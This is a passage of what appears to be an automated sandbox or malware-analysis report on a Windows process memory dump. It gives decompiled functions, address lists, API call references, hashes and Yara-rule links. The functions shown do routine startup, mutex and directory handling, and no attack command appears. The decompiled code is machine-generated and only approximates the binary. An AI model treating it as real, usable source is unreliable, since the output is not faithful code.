							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E002B6FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0x2dfa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0x2dfaa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

























































                                              0x002ae9a4
                                              0x002ae9a6
                                              0x002ae9ab
                                              0x002ae9b1
                                              0x002ae9b5
                                              0x002bc018
                                              0x002bc024
                                              0x00000000
                                              0x002ae9bb
                                              0x002ae9c0
                                              0x002ae9c2
                                              0x002ae9c9
                                              0x002ae9cc
                                              0x002ae9d3
                                              0x002bc02a
                                              0x002bc02a
                                              0x002bc036
                                              0x002bc03c
                                              0x002bc03d
                                              0x002bc049
                                              0x002bc04f
                                              0x002bc05b
                                              0x00000000
                                              0x002bc061
                                              0x002bc06d
                                              0x002aeb5a
                                              0x002aeb5a
                                              0x002aeb66
                                              0x002aeb7e
                                              0x002aeb81
                                              0x002aeb84
                                              0x002aeb8b
                                              0x002aecf0
                                              0x002aecf0
                                              0x002aecf4
                                              0x002aecf6
                                              0x002aecf9
                                              0x002aecfc
                                              0x002aecff
                                              0x002aed05
                                              0x00000000
                                              0x00000000
                                              0x002aed0a
                                              0x00000000
                                              0x002aed10
                                              0x002aed15
                                              0x00000000
                                              0x002aed17
                                              0x00000000
                                              0x002aed17
                                              0x002aed15
                                              0x00000000
                                              0x002aed0a
                                              0x002aed6e
                                              0x002aed6e
                                              0x002aeb91
                                              0x002aeb91
                                              0x002aeb68
                                              0x002aeb6d
                                              0x002aeb73
                                              0x002aeb78
                                              0x002aeccd
                                              0x002aecd2
                                              0x002aed23
                                              0x002aed26
                                              0x002aed69
                                              0x002aed69
                                              0x002aed28
                                              0x002aed2e
                                              0x002aed38
                                              0x002aecd4
                                              0x002aecd6
                                              0x002bc092
                                              0x002bc092
                                              0x002aecdc
                                              0x002aece6
                                              0x002aece6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeb78
                                              0x002aeb9b
                                              0x002aeb9f
                                              0x002aeba2
                                              0x002aeba7
                                              0x00000000
                                              0x00000000
                                              0x002bc073
                                              0x002aec20
                                              0x002aec20
                                              0x002aec26
                                              0x002aec28
                                              0x002aec30
                                              0x002aec37
                                              0x002aec3d
                                              0x002aec42
                                              0x002aec8a
                                              0x002aec91
                                              0x002aeca9
                                              0x002aecb0
                                              0x002bc084
                                              0x00000000
                                              0x002bc08a
                                              0x00000000
                                              0x002bc08a
                                              0x002aecb6
                                              0x002aecb6
                                              0x002aecb6
                                              0x002aecba
                                              0x002aecbd
                                              0x002aecc2
                                              0x00000000
                                              0x00000000
                                              0x002aecc8
                                              0x002aecc2
                                              0x002aec97
                                              0x002aec9c
                                              0x002aeca2
                                              0x002aeca7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeca7
                                              0x002aec44
                                              0x002aec4f
                                              0x002aec55
                                              0x002aec5a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aec5a
                                              0x00000000
                                              0x002aec42
                                              0x002aec60
                                              0x002aec6d
                                              0x002aec78
                                              0x002aec78
                                              0x002aec7b
                                              0x002aec85
                                              0x002aeb5a
                                              0x002aeb5a
                                              0x002aeb5a
                                              0x002aeb5a
                                              0x00000000
                                              0x002aeb26
                                              0x002aeb26
                                              0x002aeb2d
                                              0x002aeb33
                                              0x002aeb38
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aeb3e
                                              0x002aeb49
                                              0x002aeb4f
                                              0x002aeb52
                                              0x002aebde
                                              0x002aebe3
                                              0x00000000
                                              0x002aebe9
                                              0x002aebe9
                                              0x002aebe9
                                              0x002aebec
                                              0x002aebf2
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aebf2
                                              0x00000000
                                              0x002aed40
                                              0x002aed40
                                              0x00000000
                                              0x002aebf8
                                              0x002aebfd
                                              0x002aec03
                                              0x002aec06
                                              0x002aec0e
                                              0x002aec11
                                              0x002aec14
                                              0x002aec1a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aec1a
                                              0x002aec60
                                              0x002aec26
                                              0x002aebad
                                              0x002aebad
                                              0x002aebb5
                                              0x002aebb7
                                              0x002aebc5
                                              0x002bc09a
                                              0x002bc0a6
                                              0x002bc0ac
                                              0x002bc0ad
                                              0x002bc0ad
                                              0x002bc0ad
                                              0x002bc0b0
                                              0x002bc0b0
                                              0x002bc0b3
                                              0x002bc0b6
                                              0x002bc0bf
                                              0x002aedfa
                                              0x002aedfa
                                              0x002aedfa
                                              0x002aee02
                                              0x002aee04
                                              0x002aee09
                                              0x00000000
                                              0x00000000
                                              0x002aee0f
                                              0x002aee14
                                              0x002bc0cb
                                              0x002bc0cb
                                              0x002aee1a
                                              0x002aee1e
                                              0x002bc0d5
                                              0x002bc0d5
                                              0x002aee32
                                              0x002bc0f0
                                              0x002bc0f0
                                              0x002aee38
                                              0x002aee38
                                              0x002aee3a
                                              0x002aee3c
                                              0x002aee40
                                              0x002bc0eb
                                              0x002bc0eb
                                              0x00000000
                                              0x002aee46
                                              0x002aee46
                                              0x002bc0df
                                              0x002bc0e2
                                              0x002bc0e5
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002bc0e5
                                              0x002aee51
                                              0x00000000
                                              0x002aee57
                                              0x002aee59
                                              0x002aee59
                                              0x002aee51
                                              0x002aee40
                                              0x002aee5b
                                              0x002aee5d
                                              0x002aee64
                                              0x002aee67
                                              0x002aee69
                                              0x002aee99
                                              0x002aee99
                                              0x002aee6b
                                              0x002aee7a
                                              0x002aee7c
                                              0x002aee80
                                              0x002aee84
                                              0x002aee8b
                                              0x00000000
                                              0x002aee8d
                                              0x002aee8d
                                              0x002aee90
                                              0x002aee91
                                              0x002aee94
                                              0x002aee97
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aee97
                                              0x00000000
                                              0x002aee8b
                                              0x002aeea0
                                              0x00000000
                                              0x00000000
                                              0x002aeea0
                                              0x002aeea2
                                              0x002aeea2
                                              0x002aeea7
                                              0x002aeea7
                                              0x002aeeaa
                                              0x002aeda4
                                              0x002aedbc
                                              0x002aede9
                                              0x002aedec
                                              0x002aedf4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aedbe
                                              0x002aedbe
                                              0x002aedca
                                              0x002aeeb2
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb4
                                              0x002aeeb7
                                              0x002aeeb9
                                              0x002aeebc
                                              0x002aeec0
                                              0x00000000
                                              0x002aedd0
                                              0x002aedd5
                                              0x00000000
                                              0x002aedd5
                                              0x002aedca
                                              0x00000000
                                              0x002aedbc
                                              0x002aedde
                                              0x002aede8
                                              0x00000000
                                              0x002aede8
                                              0x002bc0f7
                                              0x002bc103
                                              0x002bc109
                                              0x002bc111
                                              0x002bc117
                                              0x002bc117
                                              0x002aefea
                                              0x002aefef
                                              0x002bc125
                                              0x002bc125
                                              0x002aeff5
                                              0x002aeffb
                                              0x00000000
                                              0x002aeffb
                                              0x002aebcb
                                              0x002aebce
                                              0x002aebcf
                                              0x002aebd2
                                              0x002aebdb
                                              0x002aebdb
                                              0x00000000
                                              0x002aebc5
                                              0x002ae9d9
                                              0x002ae9d9
                                              0x002ae9df
                                              0x002ae9e4
                                              0x002ae9ec
                                              0x002aea31
                                              0x00000000
                                              0x002aea33
                                              0x002ae9ee
                                              0x002ae9f8
                                              0x002ae9fa
                                              0x002aea00
                                              0x002aea07
                                              0x002aea0e
                                              0x00000000
                                              0x002aea10
                                              0x002aea10
                                              0x002aea13
                                              0x002aea16
                                              0x002aea19
                                              0x00000000
                                              0x002aea1b
                                              0x002aea1b
                                              0x002aea1b
                                              0x002aea1b
                                              0x002aea19
                                              0x002aea24
                                              0x002aea26
                                              0x00000000
                                              0x002aea26
                                              0x002aea22
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002aea22
                                              0x002ae9ec
                                              0x002aea29
                                              0x002aea2e
                                              0x002aea2e
                                              0x002ae9d3
                                              0x00000000

                                              APIs
                                                • Part of subcall function 002B00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000), ref: 002B00C1
                                                • Part of subcall function 002B00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,002ADF68,00000001,?,00000000,002B3458,-00000105,002CBDD8,00000240,002B4B82,00000000,00000000,002BAE6E,00000000,?), ref: 002B00C8
                                              • wcschr.MSVCRT ref: 002AEB6D
                                              • iswspace.MSVCRT ref: 002AEC37
                                              • wcschr.MSVCRT ref: 002AEC4F
                                              • longjmp.MSVCRT(002DB8B8,00000001,?,00000000,?,002AED9F,?,00000000,?), ref: 002BC024
                                              • longjmp.MSVCRT(002DB8B8,00000001), ref: 002BC036
                                              • longjmp.MSVCRT(002DB8B8,00000001,00000000,?,?), ref: 002BC049
                                              • longjmp.MSVCRT(002DB8B8,00000001), ref: 002BC05B
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                              • String ID:
                                              • API String ID: 2511250921-0
                                              • Opcode ID: c6985173c7b878cfd8d59b607e087d1c768b09407fd93bb65570b3d417c59282
                                              • Instruction ID: 12af18cb6d3ca9d1942c614a49fbad0ac290b9d7eb2e3ef194b937dc506ca9a3
                                              • Opcode Fuzzy Hash: c6985173c7b878cfd8d59b607e087d1c768b09407fd93bb65570b3d417c59282
                                              • Instruction Fuzzy Hash: E141F431630212C7DF305F24DC997B673A9EF81710F16456BE846A7291EF708CA6CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C93E2, Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 61%
                                              			E002C93E2(void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				int _v36;
				char _v40;
				signed int _v44;
				void _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				short _t51;
				short _t53;
				void* _t58;
				void* _t59;
				WCHAR* _t61;
				int _t62;
				short* _t75;
				void* _t76;
				short _t77;
				int _t86;
				void* _t87;
				void* _t89;
				void* _t90;
				WCHAR* _t91;
				signed int _t96;

				_t83 = __edx;
				_t68 = _t96;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t96 + 4));
				_t94 = (_t96 & 0xfffffff8) + 4;
				_t39 =  *0x2cd0b4; // 0x40f69e4c
				_v16 = _t39 ^ (_t96 & 0xfffffff8) + 0x00000004;
				_v40 = 1;
				_t86 = 0;
				_v36 = 0x104;
				_v44 = _v44 & 0;
				_t89 = __ecx;
				memset( &_v564, 0, 0x104);
				if(E002B0C70( &_v564, ((0 | _v40 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L23:
					__imp__??_V@YAXPAX@Z(_v44);
					_pop(_t87);
					_pop(_t90);
					return E002B6FD0(_t49, _t68, _v16 ^ _t94, _t83, _t87, _t90);
				}
				_t51 = 0x3d;
				_v24 = _t51;
				_v22 = _t89 + 0x40;
				_t53 = 0x3a;
				_v20 = _t53;
				_v18 = 0;
				_t91 = E002ACFBC( &_v24);
				if(_t91 == 0) {
					L4:
					_t75 = _v44;
					if(_t75 == 0) {
						_t75 =  &_v564;
					}
					 *_t75 = _v22;
					_t76 = _v44;
					if(_t76 == 0) {
						_t76 =  &_v564;
					}
					 *((short*)(_t76 + 2)) = _v20;
					_t58 = _v44;
					if(_t58 == 0) {
						_t58 =  &_v564;
					}
					_t77 = 0x5c;
					 *((short*)(_t58 + 4)) = _t77;
					_t59 = _v44;
					if(_t59 == 0) {
						_t59 =  &_v564;
					}
					 *((short*)(_t59 + 6)) = 0;
					_t84 = _v44;
					if(_v44 == 0) {
						_t84 =  &_v564;
					}
					_t79 =  &_v24;
					E002B3A50( &_v24, _t84);
					_t61 = _v44;
					if(_t61 == 0) {
						_t61 =  &_v564;
					}
					_t62 = SetCurrentDirectoryW(_t61);
					if(_t62 == 0) {
						_push(_t62);
						_push(GetLastError());
						E002AC5A2(_t79);
					}
					if(_t91 != 0) {
						SetErrorMode(_t86);
					}
					L20:
					_t80 =  *0x2e3cb8;
					if( *0x2e3cb8 == 0) {
						_t80 = 0x2e3ab0;
					}
					_t83 =  *0x2e3cc0;
					_t49 = E002B36CB(_t68, _t80,  *0x2e3cc0, 0);
					goto L23;
				}
				if(SetCurrentDirectoryW(_t91) != 0) {
					goto L20;
				}
				_t86 = SetErrorMode(1);
				goto L4;
			}
































                                              0x002c93e2
                                              0x002c93e5
                                              0x002c93e7
                                              0x002c93e8
                                              0x002c93f3
                                              0x002c93f7
                                              0x002c93ff
                                              0x002c9406
                                              0x002c9410
                                              0x002c9415
                                              0x002c9417
                                              0x002c941a
                                              0x002c9425
                                              0x002c9427
                                              0x002c9450
                                              0x002c954b
                                              0x002c954e
                                              0x002c9558
                                              0x002c955b
                                              0x002c9567
                                              0x002c9567
                                              0x002c9458
                                              0x002c9459
                                              0x002c9463
                                              0x002c9469
                                              0x002c946a
                                              0x002c9470
                                              0x002c9479
                                              0x002c947d
                                              0x002c9498
                                              0x002c9498
                                              0x002c949d
                                              0x002c949f
                                              0x002c949f
                                              0x002c94a9
                                              0x002c94ac
                                              0x002c94b1
                                              0x002c94b3
                                              0x002c94b3
                                              0x002c94bd
                                              0x002c94c1
                                              0x002c94c6
                                              0x002c94c8
                                              0x002c94c8
                                              0x002c94d0
                                              0x002c94d1
                                              0x002c94d5
                                              0x002c94da
                                              0x002c94dc
                                              0x002c94dc
                                              0x002c94e4
                                              0x002c94e8
                                              0x002c94ed
                                              0x002c94ef
                                              0x002c94ef
                                              0x002c94f5
                                              0x002c94f8
                                              0x002c94fd
                                              0x002c9502
                                              0x002c9504
                                              0x002c9504
                                              0x002c950b
                                              0x002c9513
                                              0x002c9515
                                              0x002c951c
                                              0x002c951d
                                              0x002c9523
                                              0x002c9526
                                              0x002c9529
                                              0x002c9529
                                              0x002c952f
                                              0x002c952f
                                              0x002c9537
                                              0x002c9539
                                              0x002c9539
                                              0x002c953e
                                              0x002c9546
                                              0x00000000
                                              0x002c9546
                                              0x002c9488
                                              0x00000000
                                              0x00000000
                                              0x002c9496
                                              0x00000000

                                              APIs
                                              • memset.MSVCRT ref: 002C9427
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                              • ??_V@YAXPAX@Z.MSVCRT ref: 002C954E
                                                • Part of subcall function 002ACFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,002CF830,00002000,?,?,?,?,?,002B373A,002A590A,00000000), ref: 002ACFDF
                                              • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 002C9480
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 002C9490
                                              • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 002C950B
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 002C9516
                                              • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 002C9529
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                              • String ID:
                                              • API String ID: 920682188-0
                                              • Opcode ID: 6782c888b5bea2e45e619e9aa62facd0515d2134b08afaf46d2bda0af50ad815
                                              • Instruction ID: 3cfb7d895f544499e34678ce6da9db2ecd977e99c4152223f9b9f755a34b4b73
                                              • Opcode Fuzzy Hash: 6782c888b5bea2e45e619e9aa62facd0515d2134b08afaf46d2bda0af50ad815
                                              • Instruction Fuzzy Hash: 42418231A10219ABDF24DFA4EC89FEEB3B4AF08314F00415DE809E7250EB34DA95CB55
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C17B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115synchronizationCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 67%
                                              			E002C17B6(char* __ecx, signed int* __edx) {
				intOrPtr _v0;
				signed int _v8;
				char _v528;
				void* _v532;
				signed int _v536;
				void* _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t25;
				void* _t29;
				signed int* _t39;
				char* _t40;
				void* _t54;
				signed int _t55;
				signed int _t57;

				_t40 = __ecx;
				_t20 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t20 ^ _t57;
				_t39 = __edx;
				 *((intOrPtr*)(__edx)) = 0;
				E002B274C( &_v528, 0x104, L"Local\\SM0:%d:%d:%hs", GetCurrentProcessId());
				_t25 =  &_v528;
				__imp__CreateMutexExW(0, _t25, 0, 0x1f0001, 0x40, __ecx);
				_t54 = _t25;
				_v532 = _t54;
				if(_t54 != 0) {
					E002C2D6D( &_v532,  &_v540);
					_t49 =  &_v536;
					_v536 = 0;
					_t55 = 0;
					_t53 = E002C1578( &_v528,  &_v536,  &_v532);
					if(_t53 >= 0) {
						_t55 = _v536 << 2;
						_t53 = 0;
					} else {
						_push(_t53);
						_push("wil");
						_t49 = 0x6a;
						E002C292C();
					}
					if(_t53 >= 0) {
						if(_t55 == 0) {
							L14:
							_t49 =  &_v532;
							_t40 =  &_v528;
							_t29 = E002C250A(_t40,  &_v532, _t53, _t39);
							_t53 = _t29;
							if(_t29 >= 0) {
								goto L9;
							} else {
								_t49 = 0x129;
								goto L16;
							}
							goto L18;
						} else {
							 *_t39 = _t55;
							_t40 =  *_t55 + 1;
							 *( *_t39) = _t40;
							L9:
							_t53 = 0;
						}
					} else {
						_t49 = 0x121;
						L16:
						_t40 = _v0;
						E002C292C("wil", _t53);
					}
					if(_v540 != 0 && ReleaseMutex(_v540) == 0) {
						_push(_t40);
						L13:
						E002C2D56();
						goto L14;
					}
					_t54 = _v532;
				} else {
					_t53 = E002C1EBE(_t40);
				}
				L18:
				if(_t54 != 0 && CloseHandle(_t54) == 0) {
					_push(_t40);
					goto L13;
				}
				return E002B6FD0(_t53, _t39, _v8 ^ _t57, _t49, _t53, _t54);
			}




















                                              0x002c17b6
                                              0x002c17c1
                                              0x002c17c8
                                              0x002c17ce
                                              0x002c17d5
                                              0x002c17ef
                                              0x002c17f7
                                              0x002c1805
                                              0x002c180b
                                              0x002c180d
                                              0x002c1815
                                              0x002c1833
                                              0x002c1839
                                              0x002c183f
                                              0x002c184b
                                              0x002c1852
                                              0x002c1856
                                              0x002c1871
                                              0x002c1874
                                              0x002c1858
                                              0x002c185b
                                              0x002c185c
                                              0x002c1863
                                              0x002c1864
                                              0x002c1864
                                              0x002c1878
                                              0x002c1883
                                              0x002c18b7
                                              0x002c18b8
                                              0x002c18be
                                              0x002c18c4
                                              0x002c18c9
                                              0x002c18cd
                                              0x00000000
                                              0x002c18cf
                                              0x002c18cf
                                              0x00000000
                                              0x002c18cf
                                              0x00000000
                                              0x002c1885
                                              0x002c1885
                                              0x002c188b
                                              0x002c188c
                                              0x002c188e
                                              0x002c188e
                                              0x002c188e
                                              0x002c187a
                                              0x002c187a
                                              0x002c18d4
                                              0x002c18d4
                                              0x002c18dd
                                              0x002c18dd
                                              0x002c1897
                                              0x002c18a9
                                              0x002c18af
                                              0x002c18b2
                                              0x00000000
                                              0x002c18b2
                                              0x002c18e4
                                              0x002c1817
                                              0x002c181c
                                              0x002c181c
                                              0x002c18ea
                                              0x002c18ec
                                              0x002c18f9
                                              0x00000000
                                              0x002c18fa
                                              0x002c1913

                                              APIs
                                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 002C17D7
                                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 002C1805
                                              • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 002C189F
                                              • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 002C18EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                              • String ID: Local\SM0:%d:%d:%hs$wil
                                              • API String ID: 3048291649-2303653343
                                              • Opcode ID: ce4f32d826d1d58fa2d7b47aad3ed2f902f6f7a4bb3b14b869958e3366c38c5d
                                              • Instruction ID: 0ae7686fe23ea3bc8d0625a054d0d35dcbe5323e4d4c2e1c76051be286a29f5e
                                              • Opcode Fuzzy Hash: ce4f32d826d1d58fa2d7b47aad3ed2f902f6f7a4bb3b14b869958e3366c38c5d
                                              • Instruction Fuzzy Hash: 0631F871A642199BDB21DF14DC8AFEA7375AF92700F10439DF8099B241DE709E658FD0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B6E03, Relevance: 10.6, APIs: 7, Instructions: 99sleepCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 41%
                                              			E002B6E03(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t10;
				intOrPtr _t14;
				intOrPtr _t20;
				intOrPtr* _t21;
				int _t34;
				intOrPtr _t36;
				int _t38;
				void* _t40;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x2cbe78);
				E002B75CC(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t40 - 4)) = 0;
				_t36 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t34 = 0;
				while(1) {
					_t20 = _t36;
					_t10 = 0;
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t36) {
						Sleep(0x3e8);
						continue;
					} else {
						_t38 = 1;
						_t34 = 1;
					}
					L6:
					_t47 =  *0x2cd514 - _t38; // 0x0
					if(_t47 != 0) {
						__eflags =  *0x2cd514; // 0x0
						if(__eflags != 0) {
							 *0x2cd19c = _t38;
							goto L12;
						} else {
							 *0x2cd514 = _t38;
							_t10 = E002B6F72(_t20, 0x2a1c04, 0x2a1c10);
							__eflags = _t10;
							if(__eflags == 0) {
								goto L12;
							} else {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								goto L24;
							}
						}
					} else {
						_push(0x1f);
						L002B73C4();
						L12:
						_t48 =  *0x2cd514 - _t38; // 0x0
						if(_t48 == 0) {
							_push(0x2a1c00);
							_push(0x2a1bd8);
							L002B75C6();
							 *0x2cd514 = 2;
						}
						if(_t34 == 0) {
							_t10 =  *0x2cd510;
							 *0x2cd510 = 0;
						}
						_t51 =  *0x2cd520;
						if( *0x2cd520 != 0) {
							_t10 = E002B7420(_t51, 0x2cd520);
							if(_t10 != 0) {
								_t38 =  *0x2cd520; // 0x0
								 *0x2e94b4(0, 2, 0);
								_t10 =  *_t38();
							}
						}
						_push( *0x2cd1a8);
						_push( *0x2cd1a4);
						_push( *0x2cd1a0);
						E002B44FC();
						 *0x2cd198 = _t10;
						if( *0x2cd1b0 != 0) {
							__eflags =  *0x2cd19c;
							if( *0x2cd19c == 0) {
								__imp___cexit();
							}
							 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
							L24:
							return E002B7614(0, _t34, _t38);
						} else {
							exit(_t10);
							_t21 =  *((intOrPtr*)(_t40 - 0x14));
							_t14 =  *((intOrPtr*)( *_t21));
							 *((intOrPtr*)(_t40 - 0x20)) = _t14;
							_push(_t21);
							_push(_t14);
							L002B731E();
							return _t14;
						}
					}
				}
				_t38 = 1;
				__eflags = 1;
				goto L6;
			}













                                              0x002b6e03
                                              0x002b6e05
                                              0x002b6e0a
                                              0x002b6e11
                                              0x002b6e1a
                                              0x002b6e1d
                                              0x002b6e1f
                                              0x002b6e24
                                              0x002b6e26
                                              0x002b6e28
                                              0x002b6e2e
                                              0x00000000
                                              0x00000000
                                              0x002b6e32
                                              0x002b6e40
                                              0x00000000
                                              0x002b6e34
                                              0x002b6e36
                                              0x002b6e37
                                              0x002b6e37
                                              0x002b6e4b
                                              0x002b6e4b
                                              0x002b6e51
                                              0x002b6e5d
                                              0x002b6e63
                                              0x002b6e91
                                              0x00000000
                                              0x002b6e65
                                              0x002b6e65
                                              0x002b6e75
                                              0x002b6e7c
                                              0x002b6e7e
                                              0x00000000
                                              0x002b6e80
                                              0x002b6e80
                                              0x00000000
                                              0x002b6e87
                                              0x002b6e7e
                                              0x002b6e53
                                              0x002b6e53
                                              0x002b6e55
                                              0x002b6e97
                                              0x002b6e97
                                              0x002b6e9d
                                              0x002b6e9f
                                              0x002b6ea4
                                              0x002b6ea9
                                              0x002b6eb0
                                              0x002b6eb0
                                              0x002b6ebc
                                              0x002b6ec5
                                              0x002b6ec5
                                              0x002b6ec5
                                              0x002b6ec7
                                              0x002b6ece
                                              0x002b6ed5
                                              0x002b6edd
                                              0x002b6ee3
                                              0x002b6eeb
                                              0x002b6ef1
                                              0x002b6ef1
                                              0x002b6edd
                                              0x002b6ef3
                                              0x002b6ef9
                                              0x002b6eff
                                              0x002b6f05
                                              0x002b6f0d
                                              0x002b6f19
                                              0x002b6f51
                                              0x002b6f58
                                              0x002b6f5a
                                              0x002b6f60
                                              0x002b6f65
                                              0x002b6f6c
                                              0x002b6f71
                                              0x002b6f1b
                                              0x002b6f1c
                                              0x002b6f22
                                              0x002b6f27
                                              0x002b6f29
                                              0x002b6f2c
                                              0x002b6f2d
                                              0x002b6f2e
                                              0x002b6f35
                                              0x002b6f35
                                              0x002b6f19
                                              0x002b6e51
                                              0x002b6e4a
                                              0x002b6e4a
                                              0x00000000

                                              APIs
                                              • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,002CBE78,00000010), ref: 002B6E40
                                              • _amsg_exit.MSVCRT ref: 002B6E55
                                              • _initterm.MSVCRT ref: 002B6EA9
                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 002B6ED5
                                              • exit.MSVCRT ref: 002B6F1C
                                              • _XcptFilter.MSVCRT ref: 002B6F2E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                              • String ID:
                                              • API String ID: 796493780-0
                                              • Opcode ID: 4a033dee13005ef3e156fa11fb5444cf6cecd67e6a3fd7f080c2aa374348583f
                                              • Instruction ID: 969588a809b937986259ba7e02e579243b5e963809e32a07ca05875195acb2d0
                                              • Opcode Fuzzy Hash: 4a033dee13005ef3e156fa11fb5444cf6cecd67e6a3fd7f080c2aa374348583f
                                              • Instruction Fuzzy Hash: 9631F2749A43129FDB219F28FC0DFA937A0EB457A4F54003DE50A976E0DB7489B0CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B46D8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52threadCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002B46D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0x2d3854 = _t3;
				if(GetCPInfo(_t3, 0x2d3840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0x2d3846 = 0xfe81;
						} else {
							 *0x2d3846 = 0;
						}
